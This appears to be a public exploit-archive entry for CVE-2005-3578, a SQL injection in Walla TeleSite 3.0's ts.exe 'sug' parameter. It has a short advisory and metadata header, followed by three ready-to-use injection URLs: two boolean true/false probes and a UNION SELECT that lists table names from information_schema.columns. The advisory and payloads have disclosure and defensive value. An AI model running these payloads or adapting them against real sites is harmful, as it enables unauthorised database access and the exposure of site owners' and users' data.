Walla TeleSite 3.0 - 'ts.exe?sug' SQL Injection

Author: Rafi Nahum
type: webapps
platform: cgi
port: 
date_added: 2005-11-15 
date_updated: 2013-07-01 
verified: 1 
codes: CVE-2005-3578;OSVDB-20883 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/15419/info

Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.

Walla TeleSite is prone to information and path disclosure, file enumeration, SQL injection, and cross-site scripting attacks within the context of the victim's Web browser and the affected computer.

Other attacks are also possible.

Walla Telesite version 3.0 is affected; earlier versions are also affected.

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,
null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--